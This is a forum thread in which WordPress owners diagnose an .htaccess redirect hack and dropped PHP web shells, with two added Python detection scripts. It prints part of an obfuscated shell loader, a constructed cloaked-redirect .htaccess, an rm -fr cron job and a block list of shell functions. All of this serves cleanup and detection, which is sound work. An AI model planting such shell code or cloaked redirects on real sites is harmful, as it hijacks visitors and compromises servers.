WordPress.org

Forums

3.3.1 Hacked by saveprefs.ru redirect (99 posts)

  1. jamieedwards
    Member
    Posted 2 years ago #

    Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here's one you can look at: if you search Google for harmonyhomes.net and click on the link from Google, you will see that it goes to http://saveprefs.ru/astro/index.php first, then to msn.ca. Can anyone please help me find the code? I really don't want to have to try to restore all my sites from backups.

    Thank you all.

    Jamie

  2. jamieedwards
    Member
    Posted 2 years ago #

    Looks like they got into the .htaccess file, not sure how though. Also, I am not sure if they got into any of the other files too?

    If I get rid of the hackers code in the .htaccess file, how do I stop it from coming back? The sites are running the latest version (3.3.1), and all the plugins are updated.

  3. jamieedwards
    Member
    Posted 2 years ago #

    Looks like it's running some kind of code that replaces the redirect code in the .htaccess. I cleaned the code out, uploaded the file, but when I re-download the .htaccess the malicious code is back in there :(

    Grrrrrr!!!!!! :(

  4. wsidell
    Member
    Posted 2 years ago #

    This is currently happening to me as well, I would like to get this fixed as soon as possible.

  5. djab203
    Member
    Posted 2 years ago #

    I believe the latest version of WordPress introduced this problem we're all facing. My temporary solution until this is fixed is to create a cronjob to delete the .htaccess file, since it keeps getting re-created even after it is deleted.

    # delete
    * * * * * rm -fr ./public_html/.htaccess > /dev/null 2>&1

  6. jamieedwards
    Member
    Posted 2 years ago #

    Anyone else here on shared hosting? I am just curious, as I am finding the same .htaccess file in root folders that are not even WP sites.

    Wondering if this is a FTP hack rather than a WP hack?
    If I delete the file, it gets replaced or recreated within 30 minutes or so.

  7. wsidell
    Member
    Posted 2 years ago #

    I am on shared hosting with hostgator. I sent in a security request to them telling them about the malware on my account and they have been quick to respond.

    They believe the cause of the problem is in timthumb.php, a script that many WordPress plugins use for resizing images. They have already fixed up my problem.

  8. jamieedwards
    Member
    Posted 2 years ago #

    Hmmm, I had seen a security patch for timthumb.php about 6 months ago or so, so I am not sure that is my problem. I am on 1and1, and they are slow to respond; I have been referred to their "security" team, who are only there from 9am-5pm :P

  9. lazaac
    Member
    Posted 2 years ago #

    same problem but I use zyma, also bad support and slow regarding these issues...

  10. juanda94
    Member
    Posted 2 years ago #

    Well, I have the same problem.

    I am currently trying to solve everything

    Shared hosting in banahosting

  11. jamieedwards
    Member
    Posted 2 years ago #

    Ok, so I have been working on this for hours and hours and still no luck. Here is what seems to be happening now:

    I picked one of my simple WP installs, one that is running the Twenty Ten theme, with no plugins running. (it's running 3.3.1)

    I delete the .htaccess file, but the malicious redirect is still happening, even without an .htaccess file.

    When I do a security check at sucuri.net it says:
    Malware found on javascript file:
    http://ck.jamieedwards.com/404javascript.js
    When I look for this file, I can't find it anywhere, there doesn't seem to be a 404javascript.js file anywhere?

    http://sitecheck.sucuri.net/results/ck.jamieedwards.com

  12. Roy
    Member
    Posted 2 years ago #

  13. jamieedwards
    Member
    Posted 2 years ago #

    Thanks Roy, I had looked at these links before, and have read through them at length. I have been working on this for about 7 hours now, and I am more convinced that it is a problem with my shared hosting environment (1and1), but from what I have seen so far, they are absolutely and completely incompetent, and I would highly recommend not using them for hosting. I have had nothing but bad experiences time after time with them. Their solution for me that they just sent in an email was to "create a .htaccess file and place it in the root of my site". So stupid :(

    My problem is, if I am to change hosting providers, then my sites are still messed up. I need to figure out how to clean out the malware, and see if 1and1 can plug the holes, or look at the crappy task of moving all my sites over to somewhere else. So lame :(

  14. MickeyRoush
    Member
    Posted 2 years ago #

    Also, when you replace your .htaccess file(s) set them to a file permission of 444 or something similar so that no one can write to them.

  15. impackt
    Member
    Posted 2 years ago #

    I registered here so I could help you. I had this exact problem and found this page with Google.

    There was a PHP file in my main directory that had a weird file name. I first deleted that and changed my FTP/cPanel passwords. I also had to delete the added crap that was in EVERY .htaccess file within my site -- it's all identical and was probably placed by a bot. There is something at the top and at the very bottom of each file (be sure to scroll ALL the way down).

    I noticed that my site was still being redirected and was failing the test on http://sitecheck.sucuri.net so I added a 404 redirect link in my .htaccess file and that fixed it! Let me know if this works for you

  16. impackt
    Member
    Posted 2 years ago #

    BTW, when I say that I added a "404 redirect link", I mean that I added a line similar to this in my .htaccess file:

    ErrorDocument 404 /example-404.html

  17. jamieedwards
    Member
    Posted 2 years ago #

    Ok, awesome, thanks impackt, I just noticed that I missed something way down at the bottom of the .htaccess file that was giving a 404 error. I have cleaned out everything that I can find that is obvious in the .htaccess file. I have changed my FTP and my cPanel passwords too.

    I have looked through every folder looking for any unusually named files, but can't find any. I will keep looking.

    Thanks so much for registering here to help, I appreciate it lots.

  18. jamieedwards
    Member
    Posted 2 years ago #

    Also, thanks Mickey, I have set the permissions to 444, we'll see if that stops the files from being overwritten every 30 minutes or so...

  19. impackt
    Member
    Posted 2 years ago #

    You're welcome!

    I wish I could tell you what the file name was, but I deleted it the second that I noticed it -- it was mostly composed of random numbers.

    I'll post in a few hours to let you know if my site is still clean

  20. jamieedwards
    Member
    Posted 2 years ago #

    I saw another post somewhere else tonight that mentioned the same thing. I however haven't seen anything of the sort; also, I would imagine it would have a similar last modified date as the new corrupted .htaccess file (today's date). The other post said to look for something with a name of something like ws2043124.php or something like that. I will keep looking :)

  21. p-mt
    Member
    Posted 2 years ago #

    Hello together,

    same issues on my site! I found this post quite useful: http://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en

    I looked for similar php-files and found a lot, e. g.:

    -rw-r--r-- 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
    -rw-r--r-- 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:36 w40138369n.php

    and much more.

    Unfortunately, I couldn't understand the content. It starts with:

    <?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk ...

    If anybody is interested in such a file for diagnostics, I could send it by email.

    What I have done now is:

    - Checking for unknown system users (wasn't any)
    - Changing all system passwords (root and users)
    - Changing mysql root password
    - Changing all mysql user passwords

    I realized that every few minutes the .htaccess files get updated. My plan now is:

    - to identify all w??????????n.php-files and delete them (all are under Apache DocumentRoot).
    - to delete unnecessary .htaccess-files or delete unwanted content in these .htaccess-files.
    - check, if the update of .htaccess-files will continue or is stopped.

    Keep fingers crossed that this will help!
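A scanner for the dropped files p-mt describes, added here as an example and not code from the thread: it flags PHP files with the w<8 digits>n.php naming pattern, and files whose content carries the markers visible in the quoted shell fragment ($auth_pass, "FilesMan", the preg_replace /e trick and the hex-escaped eval(gzinflate(base64_decode( stage), decoding \xNN escapes first so the obfuscated form matches. The sample shell text and the temporary directory are constructed for the demo.

```python
import os, re, tempfile

# Signatures taken from the shell fragment quoted above in this thread.
NAME_PATTERN = re.compile(r"^w\d{8}n\.php$")  # w11756090n.php style names
CONTENT_MARKERS = (
    '$auth_pass=',                    # web-shell password variable
    '"FilesMan"',                     # default action of the file-manager shell
    'preg_replace("/.*/e"',           # /e modifier evaluates the replacement as PHP
    'eval(gzinflate(base64_decode(',  # unpack-and-execute stage, hex-escaped in the sample
)
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")

def decode_hex_escapes(text):
    """Turn PHP "\\x65\\x76..." escapes into characters so obfuscated markers match."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def suspicious_markers(content):
    """Return the shell markers found in a file's de-obfuscated content."""
    decoded = decode_hex_escapes(content)
    return [m for m in CONTENT_MARKERS if m in decoded]

def scan_tree(root):
    """Walk a document root; return {path: [reasons]} for flagged .php files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in (n for n in filenames if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            reasons = []
            if NAME_PATTERN.match(name):
                reasons.append("random w<digits>n.php name seen in this attack")
            with open(path, encoding="latin-1") as fh:
                head = fh.read(4096)  # the markers sit in the first bytes of the shell
            reasons += ["contains " + m for m in suspicious_markers(head)]
            if reasons:
                findings[path] = reasons
    return findings

# Constructed sample: the opening of the shell quoted in the thread, truncated.
SAMPLE_SHELL = ('<?php $auth_pass="";$color="#df5";$default_action="FilesMan";'
                'preg_replace("/.*/e","\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E'
                '\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F'
                '\\x64\\x65\\x63\\x6F\\x64\\x65\\x28\'...')

def demo_scan():
    """Constructed tree: one shell file and one clean file; returns scan_tree() on it."""
    root = tempfile.mkdtemp()
    for name, body in (("w11756090n.php", SAMPLE_SHELL), ("index.php", "<?php echo 'ok';")):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return scan_tree(root)
```

Run scan_tree() against the Apache DocumentRoot and review every hit by hand before deleting; a matching name alone is a weaker signal than a content marker.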

  22. Old_fart
    Member
    Posted 2 years ago #

    Funny thing that php-ids.org is hacked too.

    The code that you posted is decoded to:

    eval(gzinflate(base64_decode('7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk ...

    which means: execute some shit that is zipped in base64.

    P.S.
    @p-mt, could you please upload one of the malicious files from your system to pastebin.com and post the link here. It seems like a mass attack, so we need to know what to expect.

  23. richardlin
    Member
    Posted 2 years ago #

    Hi there, i got the same issues here.. >>>,<
    Have tried most of the things that have been talked about here.
    but until now still get played by this damn crap hacker....

    :(((

  24. p-mt
    Member
    Posted 2 years ago #

    Hi Old_fart,

    here you can find the content of "w11756090n.php": w11756090n.php

  25. Old_fart
    Member
    Posted 2 years ago #

    Thanks, I will take a look at it, but all of you who got this shit need to do the following steps:

    1. locate your php.ini file
    2. replace there
    disable_functions =
    to
    disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
    3. force a restart of the http server

  26. p-mt
    Member
    Posted 2 years ago #

    do you think, wordpress will work after that??

  27. richardlin
    Member
    Posted 2 years ago #

    no search results found from searching the "w11756090n.php" here..
    instead i found a suspicious file in my /wp-content/themename/temp folder. . the file named: 303ca5097ae43fd8583179bae0b9aed8.php

    Hi Old_fart, yeah I have the same question..

  28. impackt
    Member
    Posted 2 years ago #

    My site is still clean and passing the test( http://sitecheck.sucuri.net/scanner/ ) since I fixed it 6 hours ago.

    Has anyone else had any luck with my method?

  29. richardlin
    Member
    Posted 2 years ago #

    Just now all my .htaccess files got shitted again with this crap.. :(
    I couldn't find any more suspicious files..

    hi impackt, I am sorry.. I still couldn't understand how to do your method.. All I know is that all the .htaccess files will always be edited by this shit.. Can you explain it in more detail? I'd really love to try..
    Thanks before..

  30. Old_fart
    Member
    Posted 2 years ago #

    @p-mt wrote "do you think, wordpress will work after that??"

    Mine is working. There could be some plugins that use those functions, but all of them should be avoided. You may search for those functions through all of WordPress's php files, but legitimate applications rarely use those functions.

    @richardlin The file names generated by the virus are unique because they are made with the help of a random generator.

    @impackt As I can see from the virus code, it replies with the redirect link to search engine bots ONLY and obviously will not reveal itself to a well-known scanner. sitecheck.sucuri.net can only check the output produced by the PHP code, but it can't examine your file system. You can download the Firefox plugin "User Agent Switcher" and check your site with the user agent set to "Google" or "Slurp" or "MSNBot" or "ia_archiver" or "Yandex" or "Rambler"
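Because, as Old_fart notes, the redirect is only served to search-engine referers and crawlers, a scanner that fetches the page as an ordinary browser can miss it; inspecting the .htaccess rules themselves has no such blind spot. Added example, not code from the thread: it flags RewriteCond lines keyed on search-engine referers or user agents (the cases impackt and jamieedwards found at the top and bottom of their files), RewriteRule and ErrorDocument targets that send visitors to another host, and returns the file with those lines stripped. The sample .htaccess and the malicious.example host are constructed.

```python
import re

# Crawler names from post 30 plus the referrer case from post 1 (visitor arriving from Google).
CRAWLER_WORDS = re.compile(r"google|slurp|msnbot|ia_archiver|yandex|rambler|bing|yahoo", re.I)
EXTERNAL_URL = re.compile(r"https?://", re.I)
UA_OR_REFERER = ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")

def find_injected_rules(htaccess_text):
    """Return [(line_no, reason)] for lines matching the injected redirect pattern.
    Every line is checked, so blocks at the top and the bottom are both found."""
    findings = []
    for no, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() in UA_OR_REFERER and CRAWLER_WORDS.search(parts[2]):
                findings.append((no, "condition on search-engine referer/user-agent"))
        elif directive in ("rewriterule", "errordocument") and len(parts) >= 3:
            if EXTERNAL_URL.match(parts[2]):
                findings.append((no, directive + " sends visitors offsite to " + parts[2]))
    return findings

def clean_htaccess(htaccess_text):
    """Return the file with every flagged line removed (review before writing back)."""
    bad = {no for no, _ in find_injected_rules(htaccess_text)}
    kept = [l for no, l in enumerate(htaccess_text.splitlines(), 1) if no not in bad]
    return "\n".join(kept) + "\n"

# Constructed sample: injected block on top, stock WordPress block in the middle,
# injected 404 handler at the very bottom; the target host is a placeholder.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (googlebot|slurp|msnbot) [NC]
RewriteRule .* http://malicious.example/astro/index.php [R=302,L]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

ErrorDocument 404 http://malicious.example/astro/404.php
"""
```

A clean file only resolves the symptom; the thread shows the rules being re-written every half hour until the dropped PHP shell is removed as well.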

Topic Closed

This topic has been closed to new replies.
